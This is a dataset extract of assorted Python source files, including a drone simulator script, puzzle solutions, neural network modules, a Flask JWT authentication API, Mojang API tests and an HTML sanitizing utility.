id (stringlengths 1-7) | text (stringlengths 6-1.03M) | dataset_id (stringclasses 1 value)
---|---|---|
3342123
|
# Example to run: PythonClient / multirotor / hello_drone.py
import dronesim as airsim
import time
import numpy as np
from app.driver.cross import Cross
from app.vision.number import Number
import math
import cv2
t1 = time.time()
# Connect to the AirSim simulator
client = airsim.VehicleClient()
client.connection()
uav = airsim.VehicleMotion(client)
uav.start()
image = airsim.VehicleImage(client)
number = Number(image)
# Determine the ground altitude
takeoffHigh = client.getBarometerData().altitude
print('takeoffHigh =', round(takeoffHigh, 4))
cross = Cross(client, image, number, uav, takeoffHigh)
# Take off
# client.takeoff()
uav.flyCmd('up', 'fast')
time.sleep(5)
uav.flyCmd('stop')
time.sleep(3)
# Determine the initial heading
x0 = client.getMagnetometerData().magnetic_field_body.x_val
y0 = client.getMagnetometerData().magnetic_field_body.y_val
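# Illustrative note (not part of the original script): assuming standard body-frame
# magnetometer axes, the initial heading could be estimated as
# math.degrees(math.atan2(y0, x0)).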
num = 1
# 1
cross.adjustPositionCentripetally()
cross.moveToCircle()
cross.adjustDrone()
cross.saveFrontSense(num)
num += 1
while(num <= 10):
cross.moveCircle_N()
cross.adjustDrone()
cross.saveFrontSense(num)
num += 1
t2 = time.time()
print('10-Circle complete time:', (t2-t1)/60, 'min')
|
StarcoderdataPython
|
3325701
|
<filename>day_21/solution.py
def name(f):
return f
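    # Note: the early `return f` above makes this decorator a no-op pass-through;
    # the wrapping code below, which would attach a human-readable .name for debugging,
    # is unreachable as written.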
def wrap(*a, **kw):
res = f(*a, **kw)
res.name = f.__qualname__ + "(" + ", ".join(map(repr, a)) + ")"
return res
return wrap
def ident(xs, **_):
return xs
@name
def rotate(steps, direction="right"):
if steps == 0:
return ident
d = 1 if direction == "left" else -1
def do(xs, *, reverse=False):
n = d * steps % len(xs)
if reverse:
n *= -1
return xs[n:] + xs[:n]
return do
@name
def rotate_char(c):
def do(xs, *, reverse=False):
i = xs.index(c)
if reverse:
x = xs[:]
for j in range(len(xs)):
x = rotate(1, "left")(x)
if rotate_char(c)(x[:]) == xs:
return x
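        # Forward rule: rotate right by 1 + index of c, plus one extra step when the
        # index is at least 4; the reverse branch above brute-forces the pre-image.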
return rotate(i + 1 + (i >= 4))(xs)
return do
@name
def reverse(a, b):
if a == b:
return ident
if b < a:
a, b = b, a
def do(xs, *, reverse=False):
return xs[:a] + xs[a:b+1][::-1] + xs[b+1:]
return do
@name
def move(a, b):
if a == b:
return ident
def do(xs, *, reverse=False):
if reverse:
xs.insert(a, xs.pop(b))
else:
xs.insert(b, xs.pop(a))
return xs
return do
@name
def swap(a, b):
if a == b:
return ident
def do(xs, *, reverse=False):
xs[a], xs[b] = xs[b], xs[a]
return xs
return do
@name
def swap_char(a, b):
if a == b:
return ident
def do(xs, *, reverse=False):
return swap(xs.index(a), xs.index(b))(xs)
return do
def parse(line):
parts = line.split()
if parts[0] == "swap":
_, t, x, _, _, y = parts
if t == "position":
return swap(int(x), int(y))
elif t == "letter":
return swap_char(x, y)
elif parts[0] == "move":
_, _, x, _, _, y = parts
return move(int(x), int(y))
elif parts[0] == "reverse":
_, _, x, _, y = parts
return reverse(int(x), int(y))
elif parts[0] == "rotate":
if parts[1] == "based":
return rotate_char(parts[-1])
else:
_, d, x, _ = parts
return rotate(int(x), d)
def part1(pw, ops):
for op in ops:
pw = op(pw)
return "".join(pw)
def part2(pw, ops):
for op in reversed(ops):
pw = op(pw, reverse=True)
return "".join(pw)
def main(inputs):
print("Day 21")
ops = list(map(parse, inputs))
A = part1(list("abcdefgh"), ops)
print(f"{A=}")
B = part2(list("fbgdceah"), ops)
print(f"{B=}")
|
StarcoderdataPython
|
3203967
|
<reponame>YiqunPeng/leetcode_pro
class Solution:
def maxNumberOfFamilies(self, n: int, reservedSeats: List[List[int]]) -> int:
"""Hash table.
Running time: O(r) where r == len(reservedSeats).
"""
rd = {}
for i, j in reservedSeats:
if 2 <= j <= 9:
if i not in rd:
rd[i] = [0, 0, 0, 0]
rd[i][(j - 2)//2] = 1
res = 2 * n
for k, v in rd.items():
if sum(v) == 1:
res -= 1
elif sum(v) == 2:
if v == [1, 0, 0, 1] or v == [1, 1, 0, 0] or v == [0, 0, 1, 1]:
res -= 1
else:
res -= 2
else:
res -= 2
return res
|
StarcoderdataPython
|
3326654
|
<filename>my-loop-ex1.py
#!/usr/bin/env python
b_list = range(1, 50)
for i in b_list:
if i == 13:
continue
    print(i)
if i == 39:
break
|
StarcoderdataPython
|
3250944
|
<filename>common/nets/net_disc.py
# © 2021 Nokia
#
# Licensed under the BSD 3 Clause license
# SPDX-License-Identifier: BSD-3-Clause
import sys
sys.path.append('../common')
from defaults import *
import utils
import torch
# ==============================================================================
# Settings =====================================================================
n_conv_1 = 64
n_conv_2 = 16
# ==============================================================================
# Module definitions ===========================================================
class NetDiscConvTrans(utils.DmModule):
def __init__(self, w_in, w_out, bn = True, sigm = True):
super().__init__()
self.w_out = w_out
self.bn = bn
self.sigm = sigm
# Encoder
self.enc_conv_1 = torch.nn.ConvTranspose1d(w_in, n_conv_1, 3, stride = 1, padding = 1)
self.enc_nonl_1 = torch.nn.LeakyReLU()
self.enc_samp_12 = torch.nn.Upsample(scale_factor = 4)
self.enc_conv_2 = torch.nn.ConvTranspose1d(n_conv_1, n_conv_2, 3, stride = 1, padding = 1)
self.enc_norm_2 = torch.nn.BatchNorm1d(n_conv_2)
self.enc_nonl_2 = torch.nn.LeakyReLU()
# Decoder
self.dec_conv_2 = torch.nn.Conv1d(n_conv_2, n_conv_1, 3, stride = 1, padding = 1)
self.dec_norm_2 = torch.nn.BatchNorm1d(n_conv_1)
self.dec_nonl_2 = torch.nn.LeakyReLU()
self.dec_pool_21 = torch.nn.AvgPool1d(2, stride = 4)
self.dec_conv_1 = torch.nn.Conv1d(n_conv_1, self.w_out, 3, stride = 1, padding = 1)
self.dec_nonl_1 = torch.nn.Sigmoid()
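        # Note: the encoder's Upsample(scale_factor=4) is undone by the decoder's
        # AvgPool1d(2, stride=4), so the output sequence length matches the input length.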
self.resetParams()
def resetParams(self):
for m in self.modules():
if isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.ConvTranspose1d):
torch.nn.init.xavier_normal_(m.weight)
torch.nn.init.zeros_(m.bias)
elif isinstance(m, torch.nn.BatchNorm1d):
torch.nn.init.ones_(m.weight)
torch.nn.init.zeros_(m.bias)
def encode(self, x):
x = self.enc_conv_1(x)
x = self.enc_nonl_1(x)
x = self.enc_samp_12(x)
x = self.enc_conv_2(x)
x = self.enc_norm_2(x) if self.bn else x
x = self.enc_nonl_2(x)
return(x)
def decode(self, x):
x = self.dec_conv_2(x)
x = self.dec_norm_2(x) if self.bn else x
x = self.dec_nonl_2(x)
x = self.dec_pool_21(x)
x = self.dec_conv_1(x)
x = self.dec_nonl_1(x) if self.sigm else x
return(x)
def forward(self, x):
enc = self.encode(x)
dec = self.decode(enc)
return(dec)
|
StarcoderdataPython
|
153211
|
# from preprocess import *
import keras
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D
from keras.utils import to_categorical
from keras.models import load_model
from preprocess_spectrogram import *
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'
# Preprocess data and save data to array file first
save_data_to_array()
# # Loading train set and test set
X_train, X_test, y_train, y_test = get_train_test()
#Shape of audio vectors
print(X_train.shape)
# Feature dimension
# Freq
img_dim = 28
channel = 1
epochs = 100
batch_size = 100
verbose = 1
num_classes = 8
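# Assumption (not stated in the original): get_train_test() yields 784-dimensional
# feature vectors per sample, so they can be reshaped below into (samples, 28, 28, 1)
# for the 2D convolutional network.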
# # Reshaping to perform 2D convolution
X_train = X_train.reshape(X_train.shape[0], img_dim, img_dim, channel)
X_test = X_test.reshape(X_test.shape[0], img_dim, img_dim, channel)
print(X_train.shape)
y_train_hot = to_categorical(y_train)
y_test_hot = to_categorical(y_test)
def get_model():
model = Sequential()
model.add(Conv2D(32, kernel_size=(2, 2), activation='relu', input_shape=(img_dim, img_dim, channel)))
model.add(Conv2D(64, kernel_size=(2, 2), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.3))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.3))
model.add(Dense(64, activation='relu'))
model.add(Dropout(0.4))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
return model
# Predicts one sample
def predict(filepath, model):
sample = spectrogram(filepath)
sample_reshaped = sample.reshape(1, img_dim, img_dim, channel)
return get_labels()[0][
np.argmax(model.predict(sample_reshaped))
]
model = get_model()
# model.summary()
model.fit(X_train, y_train_hot, batch_size=batch_size, epochs=epochs, verbose=verbose, validation_data=(X_test, y_test_hot))
# model.save('models/spectrogram2.h5')
# Save model plot
# from keras.utils.vis_utils import plot_model
# plot_model(model, to_file='model_plot2.png', show_shapes=True, show_layer_names=True)
print(predict('test/down.wav', model=model))
|
StarcoderdataPython
|
130120
|
"""Module containing the authentication API of the v1 API."""
from typing import Dict
from flask.helpers import url_for
from flask.views import MethodView
from dataclasses import dataclass
from flask_jwt_extended import (
create_access_token,
create_refresh_token,
current_user,
)
from .root import API_V1
from ..base_models import ApiLink, ApiResponse, DynamicApiResponseSchema
from .models import (
LoginPostSchema,
LoginTokensSchema,
AccessTokenSchema,
UserSchema,
)
from ..jwt import DemoUser
@dataclass
class AuthRootData:
self: ApiLink
@dataclass
class LoginTokensData:
self: ApiLink
access_token: str
refresh_token: str
@dataclass
class RefreshedTokenData:
self: ApiLink
access_token: str
@API_V1.route("/auth/")
class AuthRootView(MethodView):
"""Root endpoint for all authentication resources."""
@API_V1.response(DynamicApiResponseSchema())
def get(self):
"""Get the urls for the authentication api."""
return ApiResponse(
links=[
ApiLink(
href=url_for("api-v1.LoginView", _external=True),
rel=("login", "post"),
resource_type="login",
),
ApiLink(
href=url_for("api-v1.RefreshView", _external=True),
rel=("refresh", "post"),
resource_type="refresh",
),
ApiLink(
href=url_for("api-v1.WhoamiView", _external=True),
rel=("whoami", "user"),
resource_type="user",
),
],
data=AuthRootData(
self=ApiLink(
href=url_for("api-v1.AuthRootView", _external=True),
rel=("api", "authentication"),
resource_type="api",
)
),
)
@API_V1.route("/auth/login/")
class LoginView(MethodView):
"""Login endpoint to retrieve api tokens."""
@API_V1.arguments(
LoginPostSchema(),
location="json",
description="The login credentials of the user.",
)
@API_V1.response(DynamicApiResponseSchema(data_schema=LoginTokensSchema()))
def post(self, credentials: Dict[str, str]):
"""Login with the user credentials to receive a access and refresh token pair.
The access token can be used for all authorized api endpoints.
The refresh token can only be used with the refresh endpoint to get a new access token.
"""
identity = DemoUser(credentials.get("username", "guest"))
return ApiResponse(
links=[
ApiLink(
href=url_for("api-v1.RefreshView", _external=True),
rel=("refresh", "post"),
resource_type="refresh",
),
ApiLink(
href=url_for("api-v1.WhoamiView", _external=True),
rel=("whoami", "user"),
resource_type="user",
),
],
data=LoginTokensData(
self=ApiLink(
href=url_for("api-v1.LoginView", _external=True),
rel=("login", "post"),
resource_type="login",
),
access_token=create_access_token(identity=identity),
refresh_token=create_refresh_token(identity=identity),
),
)
@API_V1.route("/auth/refresh/")
class RefreshView(MethodView):
"""Refresh endpoint to retrieve new api access tokens."""
@API_V1.response(DynamicApiResponseSchema(AccessTokenSchema()))
@API_V1.require_jwt("jwt-refresh-token", refresh_token=True)
def post(self, credentials: Dict[str, str]):
"""Get a new access token.
This method requires the jwt refresh token!
"""
identity = current_user
return ApiResponse(
links=[
ApiLink(
href=url_for("api-v1.WhoamiView", _external=True),
rel=("whoami", "user"),
resource_type="user",
),
],
data=RefreshedTokenData(
self=ApiLink(
href=url_for("api-v1.RefreshView", _external=True),
rel=("refresh", "post"),
resource_type="refresh",
),
access_token=create_access_token(identity=identity, fresh=True),
),
)
@API_V1.route("/auth/whoami/")
class WhoamiView(MethodView):
"""Whoami endpoint to test the api token and get the current user info."""
@API_V1.response(DynamicApiResponseSchema(UserSchema()))
@API_V1.require_jwt("jwt")
def get(self):
"""Get the user object of the current user."""
return current_user
|
StarcoderdataPython
|
3327095
|
<reponame>dreinq/DeepQ
import multiprocessing as mp
from logging import Logger
from typing import Tuple
import torch
from torch import nn
from torch.utils.data import DataLoader
from tqdm import tqdm
from MCQ.datasets import SiftLike, Enumerate
from MCQ.envs import Env
from MCQ.utils import Saver
from MCQ.utils.runtime import Timer
from MCQ.metrics import QuantizationError, Reconstruct
from MCQ import Consts
class Eval:
def __init__(self, evalOther: bool, savePath: str, dataset: SiftLike, env: Env, model: nn.Module, logger: Logger = None):
if not evalOther:
self._model = model.cuda()
self._env = env
Saver.Load(savePath, model=self._model)
self._model.eval()
self._dataset = dataset
else:
pass
torch.autograd.set_grad_enabled(False)
self._obsMean = None
self._obsStd = None
self._logger = logger or Consts.Logger
def Encode(self, dataset, icm = False, C = None):
dataloader = DataLoader(dataset, batch_size=100000, shuffle=False, num_workers=mp.cpu_count())
B = list()
ticker = Timer()
for x in tqdm(dataloader, ncols=40, bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}"):
x = x.cuda()
if self._env.DoNormalizationOnObs:
newX = (x - self._obsMean) / self._obsStd
b = self._model.Encode(newX, icm=True, C=C, shift=self._obsMean, scale=self._obsStd)
B.append(b.detach().cpu())
interval, _ = ticker.Tick()
self._logger.info("Encode %d samples for %.2f seconds, %.2e s/sample, %.2e samples/s", len(dataset), interval, interval / len(dataset), len(dataset) / interval)
B = torch.cat(B, 0)
return B
def EncodeFast(self, dataset, icm=True, C = None):
dataloader = DataLoader(dataset, batch_size=100000, shuffle=False, num_workers=mp.cpu_count())
B = list()
icmC = C.reshape(-1, C.shape[-1])
cUnary = (icmC ** 2).sum(-1)
cPair = 2 * (icmC @ icmC.t())
ticker = Timer()
for x in tqdm(dataloader, ncols=40, bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}"):
x = x.cuda()
if self._env.DoNormalizationOnObs:
newX = (x - self._obsMean) / self._obsStd
b = self._model.EncodeFast(newX, icm=True, realX=x, C=icmC, cUnary=cUnary, cPair=cPair)
B.append(b.detach().cpu())
interval, _ = ticker.Tick()
self._logger.info("Encode %d samples for %.2f seconds, %.2e s/sample, %.2e samples/s", len(dataset), interval, interval / len(dataset), len(dataset) / interval)
B = torch.cat(B, 0)
return B
def GetCodebook(self, X, icm=False):
if self._env.DoNormalizationOnObs:
newX = X - self._obsMean.to(X.device)
newX /= self._obsStd.to(X.device)
B = self._model.Encode(newX)
C, qError = self._env.Eval(X, B)
if not icm:
return C
B = self._model.Encode(newX, icm=True, C=C, shift=self._obsMean, scale=self._obsStd)
newC, newQError = self._env.Eval(X, B)
if newQError.mean() > qError.mean():
return C
return newC
@staticmethod
def Retrieval(queries, C, B):
M, _, _ = C.shape
# if M == 1:
# return Eval._retrievalVQ(queryLoader, C, B)
topK: Tuple[torch.Tensor, torch.Tensor] = None
N = len(queries)
ix = torch.arange(len(queries))[:, None]
baseLoader = DataLoader(Enumerate(B), batch_size=1000, shuffle=False, num_workers=0)
for i, b in tqdm(baseLoader, ncols=40, bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}"):
quantized = Reconstruct(C, b)
# [N, 100]
dist = ((queries[:, None, ...] - quantized) ** 2).sum(-1)
i = i.to(b.device).expand_as(dist)
if topK is not None:
# [N, 200]
preparedI = torch.cat([i, topK[0]], -1)
# [N, 200]
preparedD = torch.cat([dist, topK[1]], -1)
else:
preparedI = i
preparedD = dist
# _, [N, 100]
_, iy = torch.topk(preparedD, k=100, dim=-1, largest=False, sorted=True)
topK = (preparedI[ix.expand_as(iy), iy], preparedD[ix.expand_as(iy), iy])
return topK[0]
# # [NB, D]
# quantized = Reconstruct(C, B)
# results = []
# for q in tqdm(queryLoader, ncols=40, bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}"):
# q = q.cuda()
# # [NQ, NB]
# dist = ((q[:, None, ...] - quantized) ** 2).sum(-1)
# _, indices = torch.topk(dist, k=100, dim=-1, largest=False, sorted=True)
# results.append(indices.detach())
# return torch.cat(results, 0)
@staticmethod
def RetrievalSlow(queries, C, B):
M, _, _ = C.shape
queryLoader = DataLoader(queries, batch_size=1, num_workers=0, shuffle=False)
if M == 1:
return Eval._retrievalVQ(queryLoader, C, B)
# [NB, D]
quantized = Reconstruct(C, B)
results = []
for q in tqdm(queryLoader, ncols=40, bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}"):
q = q.cuda()
# [NQ, NB]
dist = ((q[:, None, ...] - quantized) ** 2).sum(-1)
_, indices = torch.topk(dist, k=100, dim=-1, largest=False, sorted=True)
results.append(indices.detach())
return torch.cat(results, 0)
@staticmethod
def _retrievalVQ(queryLoader, C, B):
# [NB, 1] -> [NB]
B = B.squeeze()
results = []
slot = B.shape[0] // C.shape[1]
for q in tqdm(queryLoader, ncols=40, bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}"):
q = q.cuda()
# [N, K] <- [N, 1, D], [1, K, D]
dist = ((q[:, None, ...] - C) ** 2).sum(-1)
# [N, NB]
allDist = dist[:, B]
# [N, slot]
_, indices = torch.topk(allDist, k=slot, dim=-1, largest=False, sorted=True)
results.append(indices.detach())
# [NQ, 100]
return torch.cat(results, 0)
@staticmethod
def Recall(results, groundtruths):
# [N, 100] = [N, 100] == [N, 1]
isin = results == groundtruths
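        # recall@i is the fraction of queries whose true nearest neighbour appears
        # anywhere in their top-i retrieved ids.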
recalls = []
for i in range(1, isin.shape[-1] + 1):
recalls.append(isin[:, :i].any(-1).float().mean())
return torch.Tensor(recalls)
def Test(self, C=None, B=None):
sift = self._dataset
if self._env.DoNormalizationOnObs:
self._obsMean = sift.data.mean(0).cuda()
self._obsStd = sift.data.std(0).cuda()
if C is None:
sift.Train()
C = self.GetCodebook(sift.data, icm=True).cuda()
if B is None:
sift.Encode(device="cpu")
B = self.Encode(sift, icm=True, C=C)
self._logger.info("Quantization error in base: %.8e", QuantizationError(sift.data.cuda(), C.cuda(), B.cuda()).mean())
sift.Query(device="cuda")
# queryLoader = DataLoader(sift, batch_size=1, shuffle=False, num_workers=mp.cpu_count())
results = self.Retrieval(sift.data, C.cuda(), B.cuda())
sift.Gt(device="cuda")
recalls = self.Recall(results, sift.data[:, :1]) * 100
self._logger.info("R @ 1: %.2f%%", recalls[0])
self._logger.info("R @ 10: %.2f%%", recalls[9])
self._logger.info("R @ 100: %.2f%%", recalls[99])
|
StarcoderdataPython
|
1695877
|
<reponame>Lucino772/pymojang<gh_stars>1-10
import unittest
import mojang
from mojang.account.structures.base import (
NameInfoList,
UUIDInfo,
NameInfo,
)
from mojang.account.structures.profile import UnauthenticatedProfile
from mojang.account.structures.session import Cape, Skin
class TestMojangAPI(unittest.TestCase):
def test_existent_uuid(self):
self.assertEqual(
mojang.get_uuid("Notch").uuid, "069a79f444e94726a5befca90e38aaf5"
)
self.assertEqual(
mojang.get_uuid("jeb_").uuid, "853c80ef3c3749fdaa49938b674adae6"
)
def test_unexistent_uuid(self):
self.assertEqual(mojang.get_uuid("UNEXISTENT_PLAYER"), None)
def test_existent_uuids(self):
self.assertEqual(
mojang.get_uuids(["Notch", "jeb_"]),
[
UUIDInfo("Notch", "069a79f444e94726a5befca90e38aaf5"),
UUIDInfo("jeb_", "853c80ef3c3749fdaa49938b674adae6"),
],
)
self.assertEqual(
mojang.get_uuids(["jeb_", "Notch"]),
[
UUIDInfo("jeb_", "853c80ef3c3749fdaa49938b674adae6"),
UUIDInfo("Notch", "069a79f444e94726a5befca90e38aaf5"),
],
)
def test_unexistent_uuids(self):
self.assertEqual(
mojang.get_uuids(["jeb_", "UNEXISTENT_PLAYER"]),
[UUIDInfo("jeb_", "853c80ef3c3749fdaa49938b674adae6"), None],
)
self.assertEqual(
mojang.get_uuids(["UNEXISTENT_PLAYER1", "UNEXISTENT_PLAYER2"]),
[None, None],
)
def test_existent_names(self):
self.assertEqual(
mojang.names("069a79f444e94726a5befca90e38aaf5"),
NameInfoList([NameInfo("Notch", None)]),
)
self.assertEqual(
mojang.names("853c80ef3c3749fdaa49938b674adae6"),
NameInfoList([NameInfo("jeb_", None)]),
)
def test_unexistent_names(self):
self.assertEqual(
mojang.names("069a79f444e94726a5befca90e38aaf6"), NameInfoList([])
)
def test_existent_profile(self):
self.assertEqual(
mojang.user("069a79f444e94726a5befca90e38aaf5"),
UnauthenticatedProfile(
"Notch",
"069a79f444e94726a5befca90e38aaf5",
False,
False,
NameInfoList([NameInfo("Notch", None)]),
Skin(
"http://textures.minecraft.net/texture/292009a4925b58f02c77dadc3ecef07ea4c7472f64e0fdc32ce5522489362680",
"classic",
),
None,
),
)
self.assertEqual(
mojang.user("853c80ef3c3749fdaa49938b674adae6"),
UnauthenticatedProfile(
"jeb_",
"853c80ef3c3749fdaa49938b674adae6",
False,
False,
NameInfoList([NameInfo("jeb_", None)]),
Skin(
"http://textures.minecraft.net/texture/7fd9ba42a7c81eeea22f1524271ae85a8e045ce0af5a6ae16c6406ae917e68b5",
"classic",
),
Cape(
"http://textures.minecraft.net/texture/9e507afc56359978a3eb3e32367042b853cddd0995d17d0da995662913fb00f7"
),
),
)
def test_unexistent_profile(self):
self.assertEqual(mojang.user("0<PASSWORD>"), None)
|
StarcoderdataPython
|
1708000
|
import importlib
import pytest
class TestSSLFailure(object):
@pytest.mark.run(order=-1)
def test_ssl_failure(self, monkeypatch):
import ssl
monkeypatch.delattr(ssl, "PROTOCOL_TLSv1", raising=True)
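        # stomp.transport resolves DEFAULT_SSL_VERSION at import time (assumption based on
        # this test's structure), hence the reload below after removing the ssl attribute.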
import stomp.transport as t
importlib.reload(t)
assert t.DEFAULT_SSL_VERSION is None
monkeypatch.undo()
importlib.reload(ssl)
@pytest.mark.run(order=-1)
def test_socket_failure(self, monkeypatch):
import socket
monkeypatch.delattr(socket, "SO_KEEPALIVE", raising=True)
import stomp.transport as t
importlib.reload(t)
assert not t.LINUX_KEEPALIVE_AVAIL
monkeypatch.undo()
importlib.reload(socket)
|
StarcoderdataPython
|
3361872
|
import random
from jogador import Jogador
class Aleatorio(Jogador):
def __init__(self, nome):
return super().__init__(nome)
def deveComprar(self, propriedade):
return self.temSaldoPositivo() and self.temProbabilidade()
def temProbabilidade(self):
return random.randint(0, 2) > 1
|
StarcoderdataPython
|
179920
|
import pandas as pd
import inspect
import unittest
import numpy as np
'''
The general.unique function takes an array-like object and returns the unique values in it. To test this we simply pass in different lists where some
of the values are not unique, and check whether general.unique returns the right values.
From documentation:
Parameters: values1d: array-like
Returns:
numpy.ndarray or ExtensionArray
The return can be:
Index : when the input is an Index
Categorical : when the input is a Categorical dtype
ndarray : when the input is a Series/ndarray
Return numpy.ndarray or ExtensionArray.
'''
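# For example, pd.unique([1, 2, 2, 3]) returns array([1, 2, 3]), keeping first-seen order.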
def all_true(arr):
'''Returns True if all items in array is True.
Otherwise return False'''
state = True
for item in arr:
if item == False:
return False
return True
class TestUnique(unittest.TestCase):
'''Functions for testing the unique in pandas general functions'''
def setUp(self):
self.sequence1 = [1, 2, 3]
self.sequence2 = [1, 2, 3, 3]
self.sequence3 = []
self.sequence4 = [0]*1000000 + [1]
def test_unique_blackbox(self):
#basic uniqueness test given documentation
sequence1_unique = pd.unique(self.sequence1)
# unique list, should stay the same
self.assertTrue(all_true(sequence1_unique == [1, 2, 3]))
sequence2_unique = pd.unique(self.sequence2)
# not unique list, should become unique
self.assertTrue(all_true(sequence2_unique == [1, 2, 3]))
sequence3_unique = pd.unique(self.sequence3)
# empty list, should stay empty
self.assertTrue(all_true(sequence3_unique == []))
        # bigger list with a lot of 0s and one 1. Should become just the 0 and the 1.
sequence3_unique = pd.unique(self.sequence4)
self.assertTrue(all_true(sequence3_unique == [0,1]))
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
1659911
|
import typing
import bleach
# import markdown2
from nasse import config, logging
# Source: en.wikipedia.org/wiki/Whitespace_character
# Note: BRAILLE PATTERN BLANK, HANGUL FILLER, <NAME>, <NAME>LER and HALFWIDTH HANGUL FILLER are also referred to here as "whitespaces" while they aren't according to the Unicode standard.
WHITESPACES = ["\u0009", "\u000A", "\u000B", "\u000C", "\u000D", "\u0020", "\u0085", "\u00A0", "\u1680", "\u2000", "\u2001", "\u2002", "\u2003", "\u2004", "\u2005", "\u2006", "\u2007", "\u2008", "\u2009", "\u200A", "\u2028", "\u2029", "\u202F", "\u205F", "\u3000", "\u180E", "\u200B",
"\u200C", "\u200D", "\u2060", "\uFEFF", "\u00B7", "\u21A1", "\u2261", "\u237D", "\u23CE", "\u2409", "\u240A", "\u240B", "\u240C", "\u240D", "\u2420", "\u2422", "\u2423", "\u2424", "\u25B3", "\u2A5B", "\u2AAA", "\u2AAB", "\u3037", "\u2800", "\u3164", "\u115F", "\u1160", "\uFFA0"]
# Markdown Parsing
EXTRAS = ["code-friendly", "cuddled-lists", "fenced-code-blocks", "footnotes",
"nofollow", "spoiler", "strike", "target-blank-links", "tables", "task_list"]
ALLOWED_TAGS = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'h7', 'h8', 'br', 'b', 'i', 'strong', 'em', 'a', 'pre', 'code', 'img', 'tt', 'div', 'ins', 'del', 'sup', 'sub', 'p', 'ol', 'ul', 'table', 'thead', 'tbody', 'tfoot', 'blockquote', 'dl',
'dt', 'dd', 'kbd', 'q', 'samp', 'var', 'hr', 'ruby', 'rt', 'rp', 'li', 'tr', 'td', 'th', 's', 'strike', 'summary', 'details', 'caption', 'figure', 'figcaption', 'abbr', 'bdo', 'cite', 'dfn', 'mark', 'small', 'span', 'time', 'wbr']
ALLOWED_ATTRS = {
"*": ['abbr', 'accept', 'accept-charsetaccesskey', 'action', 'align', 'altaria-describedby', 'aria-hidden', 'aria-label', 'aria-labelledbyaxis', 'border', 'cellpadding', 'cellspacing', 'charcharoff', 'charset', 'checkedclear', 'cols', 'colspan', 'colorcompact', 'coords', 'datetime', 'dirdisabled', 'enctype', 'for', 'frameheaders', 'height', 'hreflanghspace', 'ismap', 'label', 'langmaxlength', 'media', 'methodmultiple', 'name', 'nohref', 'noshadenowrap', 'open', 'progress', 'prompt', 'readonly', 'rel', 'revrole', 'rows', 'rowspan', 'rules', 'scopeselected', 'shape', 'size', 'spanstart', 'summary', 'tabindex', 'targettitle', 'type', 'usemap', 'valign', 'valuevspace', 'width', 'itemprop'],
"a": ['href'],
"img": ['src', 'longdesc'],
"div": ['itemscope', 'itemtype'],
"blockquote": ['cite'],
"del": ['cite'],
"ins": ['cite'],
"q": ['cite']
}
ALLOWED_PROTO = ['http', 'https', 'mailto']
def remove_spaces(string: str):
"""Removes all whitespaces from the given string"""
if string is None:
return ""
return "".join(l for l in str(string) if l not in WHITESPACES)
def alphabetic(string: str, decimals: bool = True):
"""Removes all of the non alphabetical letters from the string"""
if string is None:
return ""
if decimals:
return "".join(l for l in str(string) if l.isalpha() or l.isdecimal())
return "".join(l for l in str(string) if l.isalpha())
def sanitize_http_method(method: str):
"""Sanitizes the given HTTP method to normalize it"""
method = remove_spaces(method).upper()
if method not in config.Enums.Conventions.HTTP_METHODS and method != "*":
logging.log(
message="The provided HTTP method {method} does not seem to be in the set of defined HTTP methods".format(
method=method),
level=logging.LogLevels.WARNING)
return method
def sort_http_methods(methods: typing.Iterable):
"""Sorts the given HTTP methods to normalize them"""
methods = {sanitize_http_method(method) for method in methods}
results = []
for method in ["GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS"]: # ordered
if method in methods:
results.append(method)
methods.discard(method)
results.extend(methods) # remaining methods
return results
# def markdown_to_html(md: str, table_of_content=False):
# """Markdown to HTML with Sanitizing and Link Recognition"""
# html = markdown2.markdown(str(md), extras=EXTRAS +
# (["toc"] if table_of_content else []))
# cleaner = bleach.Cleaner(tags=ALLOWED_TAGS, attributes=ALLOWED_ATTRS,
# protocols=ALLOWED_PROTO, filters=[bleach.linkifier.LinkifyFilter])
# return cleaner.clean(str(html))
def sanitize_text(text: str, strict=True):
"""Sanitize text by removing any forbidden HTML part snippet"""
if strict:
return bleach.clean(str(text), tags=["b", "i", "em", "strong"], attributes=[], protocols=[])
return bleach.clean(str(text), tags=ALLOWED_TAGS, attributes=ALLOWED_ATTRS, protocols=ALLOWED_PROTO)
def split_on_uppercase(string: str):
"""
Splits a string on any uppercase letter
Parameters
-----------
string: str
The string to split
Returns
-------
list
The string splitted
"""
start = 0
results = []
string = str(string)
length = len(string)
for index, letter in enumerate(string):
if letter.isupper() and (string[index - 1].islower() or (length > index + 1 and string[index + 1].islower())):
results.append(string[start:index])
start = index
results.append(string[start:])
return results
DELIMITER = "🈑"
def to_path(name: str) -> str:
"""
Converts a method name to a path
Parameters
----------
name: str
The name of the method/class/object
"""
name = str(name)
# hello__username__ --> hello/<username>
in_variable = False
result = ""
name_length = len(name)
for index, letter in enumerate(name):
if letter == "_":
if in_variable: # <hello_world>
# the previous _ got replaced by >, so we don't need to convert it too
if result[-1] == ">":
result += "_"
continue
# the previous _ got replaced by <, so we don't need to convert it too
elif result[-1] == "<":
continue
# "__" --> ">"
elif index + 1 < name_length and name[index + 1] == "_":
in_variable = False
result += ">"
else:
result += DELIMITER # we want to keep any "_" inside a variable name
continue
else:
# "__" --> "<"
if index + 1 < name_length and name[index + 1] == "_":
in_variable = True
result += "_<"
else: # a regular _, to be converted into "/"
result += letter
continue
else:
result += letter
name = result
# nasse.utils.sanitize --> nasse/utils/sanitize
name = "/".join(str(name).split("."))
# hello_world --> hello/world
name = "/".join(name.split("_"))
# helloWorld --> hello-world
name = "-".join(split_on_uppercase(name)).lower()
